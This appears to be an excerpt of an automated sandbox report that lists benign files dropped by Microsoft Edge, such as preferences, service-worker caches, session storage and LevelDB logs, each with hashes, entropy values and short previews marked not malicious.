SHA-256:	CA87594455C9EA3584C05E939126EA07A79472E11C82E9B6370A05D4A48E30E7
SHA-512:	3097CC384222A6B46F70BEFBBB7FB6C42A39631DC891B53FCB51808EB02BB2F05513A862032B2DE49C9581A516AD67D347E780BAE0B10D93A12690F8A313AD0E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748391374","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26889
Entropy (8bit):	5.577315277305042
Encrypted:	false
SSDEEP:	768:7GUWRzWPdNfKF8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP32kx5VrwdJpJtuD:7GUWRzWPdNfKFu1jaO32S5eDtM
MD5:	21671A7CB761FBA25CB269192760551A
SHA1:	D7EC43603D5FBF76511268667FF9E63E99DA5571
SHA-256:	2B337B542B6FC9B8C3F83127F36F9ED4738EF52FAE6E7D5287FDCC47B35840D7
SHA-512:	8166CF4E9C6C52BCF51F6F0E7C54B06C96D24220667423C12A6538D6FEED7E0F0542A49FB89ECC1C5EEEFC9B78306B8A345B29AEF5C22CF0C8985B2AEBCBCF6B
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903747659779","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903747659779","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3a058.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26889
Entropy (8bit):	5.577315277305042
Encrypted:	false
SSDEEP:	768:7GUWRzWPdNfKF8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP32kx5VrwdJpJtuD:7GUWRzWPdNfKFu1jaO32S5eDtM
MD5:	21671A7CB761FBA25CB269192760551A
SHA1:	D7EC43603D5FBF76511268667FF9E63E99DA5571
SHA-256:	2B337B542B6FC9B8C3F83127F36F9ED4738EF52FAE6E7D5287FDCC47B35840D7
SHA-512:	8166CF4E9C6C52BCF51F6F0E7C54B06C96D24220667423C12A6538D6FEED7E0F0542A49FB89ECC1C5EEEFC9B78306B8A345B29AEF5C22CF0C8985B2AEBCBCF6B
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903747659779","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903747659779","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2394
Entropy (8bit):	5.822065431114797
Encrypted:	false
SSDEEP:	24:F2xc5NmpcncmoDCRORpllg2hEHfRHzldCRORpllg2h4iV0dkFCRORpllg2hECRHJ:F2emiMrd6HfBFrdey0dmrd6CBlrdkBY
MD5:	D87F4693A7AA8B7370DF3E49E9970AB3
SHA1:	898A9195AB4A409A803D7DEF9BBDC05A3F0DA10B
SHA-256:	213A579EFEDA05736ACC8DC8321AE05222FEE55413B9BB893A92F91915EFCA58
SHA-512:	44F7B492694A908070DE5EE98EF2DD7EB98C6ED554C66776FC8EC8C24D8A29E95D0984E0886112A5DA4D7FF14B0E36A623A7E00D513307448D4A082F1F100EB5
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2... .................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.216170441258613
Encrypted:	false
SSDEEP:	6:iOrvRJJSB1CHhJ23oH+TcwtE/a252KLl5vRJ0+q2PCHhJ23oH+TcwtE/a2ZIFUv:7PJSdYeb8xLT0+vBYeb8J2FUv
MD5:	EFED5C83E691E72EACBB29021FDC672F
SHA1:	4A888AD67706F3EA2EBA21242D92891EDCF148BB
SHA-256:	C6273573D25B5EA7B85CEDF3BCB5E818D609B0C611D8581940454EAD3A892C8C
SHA-512:	73624A9C664D13F1CB2E551BA76F783E4C3F1CE31B664C8AC343F0D300976632D913858AE8BF7B75E66DAF398327C9B3FDC9CDDE4697FB990D19F53B42786DF7
Malicious:	false
Preview:	2025/01/09-08:42:37.555 182c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/09-08:42:37.568 182c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	115808
Entropy (8bit):	5.577277448243048
Encrypted:	false
SSDEEP:	1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNt4newXRvrS9:B9LyxPXfOxr1lMe1nL/5L/TXJ6LwXRs
MD5:	163DEB8CD7D1D912BF6C389B71118C99
SHA1:	C81791F3B0BE375851A4AFC70E39EE7D15C8B4DC
SHA-256:	A4187FB799013935110031C9EB0129807AD5C4F101174E62D9AACBFEBAB7872D
SHA-512:	A30A0CA8AD147EA038489948685A6CD6C5BBBC0BE2F36FF3C199852CD06506244586883150CA88702BEA04C2D0E1BD289C03E06B1ED0F31A0C15A4B1AE449FAA
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 16384-1040, spot sensor temperature 88544371553805847756800.000000, unit celsius, color scheme 0, show spot sensor, calibration: offset 8389120.000000, slope 158465089740720881248604520448.000000
Category:	dropped
Size (bytes):	190393
Entropy (8bit):	6.389213518037204
Encrypted:	false
SSDEEP:	3072:kXxYxKyQXqKw4TqcFtGC0L/ui49Hyaqe/IaZxKgy1S7gXu:/KwbstEL/D45sGvm1Wt
MD5:	94D46A4B5081F874F1786A7D74C41F2D
SHA1:	AE447F740316AF7C77148D50DE36CB8C24D2BFF9
SHA-256:	4B62A7F01B17C0DBB0E9A2F0294E031ABB5B96F649411BD66FBF9E3068533965
SHA-512:	8615F2EF2CC33E6EE2C5CE36005B23E40537DD4B44E12840DC2B0FB1F920A3D77D96D91C3F4A16755E39D21BB269AA5563F243A8395C30E66CF7DA13BA28C537
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;o....x.`........,T.8..`,.....L`.....,T...`......L`......RcZ.......exports...Rc&.7.....module....RcZ3.'....define....Rb.......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....,..{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....d...,T.`.`z.....L`..........a............a.........Dr8..............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.565412423760729
Encrypted:	false
SSDEEP:	3:7urKi0Xl/l+/l9/lxEgW/lQDbKl:qrKtqOjQDul
MD5:	BA15775FEC340352AF00B13D127154F4
SHA1:	C935F7CF4A143DB922EC5E4FABEE984A32016A98
SHA-256:	6000034A96483B13F57A502DA1AF53163AC079E336D839ED5CA3056D4834BBC5
SHA-512:	F3976464B422D1CCB9BDA2628B1F719A0EFF28B1F9EEF23A8189B277494C7D1C05E9B5D3A0FA36EA3878A73C11E974323D62EB08F15488E4B0BF6D0900A03AD7
Malicious:	false
Preview:	@......oy retne.........................X....,..................No./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.565412423760729
Encrypted:	false
SSDEEP:	3:7urKi0Xl/l+/l9/lxEgW/lQDbKl:qrKtqOjQDul
MD5:	BA15775FEC340352AF00B13D127154F4
SHA1:	C935F7CF4A143DB922EC5E4FABEE984A32016A98
SHA-256:	6000034A96483B13F57A502DA1AF53163AC079E336D839ED5CA3056D4834BBC5
SHA-512:	F3976464B422D1CCB9BDA2628B1F719A0EFF28B1F9EEF23A8189B277494C7D1C05E9B5D3A0FA36EA3878A73C11E974323D62EB08F15488E4B0BF6D0900A03AD7
Malicious:	false
Preview:	@......oy retne.........................X....,..................No./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3c64f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.565412423760729
Encrypted:	false
SSDEEP:	3:7urKi0Xl/l+/l9/lxEgW/lQDbKl:qrKtqOjQDul
MD5:	BA15775FEC340352AF00B13D127154F4
SHA1:	C935F7CF4A143DB922EC5E4FABEE984A32016A98
SHA-256:	6000034A96483B13F57A502DA1AF53163AC079E336D839ED5CA3056D4834BBC5
SHA-512:	F3976464B422D1CCB9BDA2628B1F719A0EFF28B1F9EEF23A8189B277494C7D1C05E9B5D3A0FA36EA3878A73C11E974323D62EB08F15488E4B0BF6D0900A03AD7
Malicious:	false
Preview:	@......oy retne.........................X....,..................No./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	5127
Entropy (8bit):	3.430230087477078
Encrypted:	false
SSDEEP:	96:Id99sE6n7L3lpmVX1V0VDZf89Xp+/+Vi0TLl9iSrk1mZk74pNF6Nv:ssE6n7h0VX1V0Vm9Xp+/KiKLl9iSrkME
MD5:	2D009A0921A7B8C517A7425457ACD246
SHA1:	DA99C60B94F276AE37DAAED09B0CF17AAAE8BC28
SHA-256:	A98B9371D782E3727A9B3ADDDD9D3C3B182BE6D873B429A27EFBF927DC2FDCC0
SHA-512:	D605E503B7B0CAC5A393275732C0F2BC0DDF0A39D2BE0E16C4DBE3A10A2098CCD7699DB47389F0C7202261864ED05CEE608468D0AADF3E37D22C8E87C8A5486C
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................\.0b................next-map-id.1.Cnamespace-69e02e9c_8851_4978_97b3_e5ee805e9e5b-https://ntp.msn.com/.0....................map-0-shd_sweeper.%{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.b.i.n.g._.v.2._.s.c.o.p.e.-.c.,.p.r.g.-.1.s.w.-.s.a.c.f.x.2.t.4.,.p.r.g.-.1.s.w.-.c.c.-.c.r.b.n.d.l.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.c.,.p.r.g.-.1.s.w.-.l.d.n.y.c.t.-.t.r.a.n.s.i.t.,.p.r.g.-.1.s.w.-.t.r.a.n.-.t.r.d.,.p.r.g.-.f.i.n.-.c.l.e.f.t.r.a.,.r.o.u.t.e.a.u.t.h.p.r.o.d.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.t.r.a.f.f.i.c.-.t.r.a.n.-.n.y.-.t.,.p.r.g.-.p.2.-.l.d.n.y.-.t.r.a.n.s.i.t.,.p.r.g.-.p.2.-.t.r.a.n.-.t.r.d.,.1.s.-.f.c.r.y.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.19839579672767
Encrypted:	false
SSDEEP:	6:iOrvRDM+q2PCHhJ23oH+TcwtrQMxIFUtJvRm9mZmwPvRqkqMVkwOCHhJ23oH+TcM:75M+vBYebCFUtt/2MV56YebtJ
MD5:	37EC0D3801499A3B773FE719D52567B8
SHA1:	099F636B03F41A176F0BDF511B2F3C008385F6C5
SHA-256:	6612300727BFEB4472E67CBE9D93B533FCEE790874F62D31819241D2615A88A5
SHA-512:	B597CFCF2D313EE6FBDEEA2BCDE76B1979374561B95407AAE30F7EF319DEB52D1B639940935D5C0C4F1CE58A648081C1C30426FE36701795F252AC9984729033
Malicious:	false
Preview:	2025/01/09-08:42:28.444 66c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:42:28.445 66c Recovering log #3.2025/01/09-08:42:28.449 66c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.19839579672767
Encrypted:	false
SSDEEP:	6:iOrvRDM+q2PCHhJ23oH+TcwtrQMxIFUtJvRm9mZmwPvRqkqMVkwOCHhJ23oH+TcM:75M+vBYebCFUtt/2MV56YebtJ
MD5:	37EC0D3801499A3B773FE719D52567B8
SHA1:	099F636B03F41A176F0BDF511B2F3C008385F6C5
SHA-256:	6612300727BFEB4472E67CBE9D93B533FCEE790874F62D31819241D2615A88A5
SHA-512:	B597CFCF2D313EE6FBDEEA2BCDE76B1979374561B95407AAE30F7EF319DEB52D1B639940935D5C0C4F1CE58A648081C1C30426FE36701795F252AC9984729033
Malicious:	false
Preview:	2025/01/09-08:42:28.444 66c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:42:28.445 66c Recovering log #3.2025/01/09-08:42:28.449 66c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380903750126848

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.785877639670305
Encrypted:	false
SSDEEP:	24:3pZfUUrVGeZWNpsAF4unxmtLp3X2amEtG1Chq80Cu04QKkOAM4DG:3pZf1rceYzFYLp2FEkChcgZHOpeG
MD5:	785E7DCF60FC851BFA9D62D60EAA0092
SHA1:	CD0FD65793148B62D10138E3EA5F587E113B529A
SHA-256:	4B72566E3BE9640634AF50992CD0CDE246E8945A0313ECE728F8735A6E52B85F
SHA-512:	0F3C07FBE61F49BE2340C5718E4AD219C131287731B7809681FC5C9DCCF367DAA476CB64D4136FC1D52D8159E043778DF53C8D531CFD2066CA1312BE3EE2FD33
Malicious:	false
Preview:	SNSS.......54:U...........54:U......"54:U...........54:U.......54:U.......64:U.......64:U....!..64:U...............................54:U64:U1..,...64:U$...69e02e9c_8851_4978_97b3_e5ee805e9e5b...54:U.......64:U.....d.........54:U...54:U.......................54:U....................5..0...54:U&...{890D5FC3-0C4C-4214-A93A-B8E730A022A1}.....54:U..........64:U...........64:U........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........]H&F+...]H&F+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... ...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.19178684156828
Encrypted:	false
SSDEEP:	6:iOrvRKV+q2PCHhJ23oH+Tcwt7Uh2ghZIFUtJvRKBZmwPvRKEVkwOCHhJ23oH+Tcz:7BvBYebIhHh2FUtS/P56YebIhHLJ
MD5:	DE1CB7E1BD6FF5380377BECAB0379136
SHA1:	1F22BD67A96E83E746624D439E3D5D5C1155794E
SHA-256:	88E4486D95D761D3BBA096907739D656BC1C265B312C7D7233D238D1D138C399
SHA-512:	F46DA1C4651DADD822FFA791684242C0FF603E909E289965829CF0D600E32E646FE5BA5A75E52E564870C0C9AB02F4805BB08A3C85D8A7916F90BC610708485C
Malicious:	false
Preview:	2025/01/09-08:42:27.873 1d58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:42:27.873 1d58 Recovering log #3.2025/01/09-08:42:27.874 1d58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.19178684156828
Encrypted:	false
SSDEEP:	6:iOrvRKV+q2PCHhJ23oH+Tcwt7Uh2ghZIFUtJvRKBZmwPvRKEVkwOCHhJ23oH+Tcz:7BvBYebIhHh2FUtS/P56YebIhHLJ
MD5:	DE1CB7E1BD6FF5380377BECAB0379136
SHA1:	1F22BD67A96E83E746624D439E3D5D5C1155794E
SHA-256:	88E4486D95D761D3BBA096907739D656BC1C265B312C7D7233D238D1D138C399
SHA-512:	F46DA1C4651DADD822FFA791684242C0FF603E909E289965829CF0D600E32E646FE5BA5A75E52E564870C0C9AB02F4805BB08A3C85D8A7916F90BC610708485C
Malicious:	false
Preview:	2025/01/09-08:42:27.873 1d58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:42:27.873 1d58 Recovering log #3.2025/01/09-08:42:27.874 1d58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
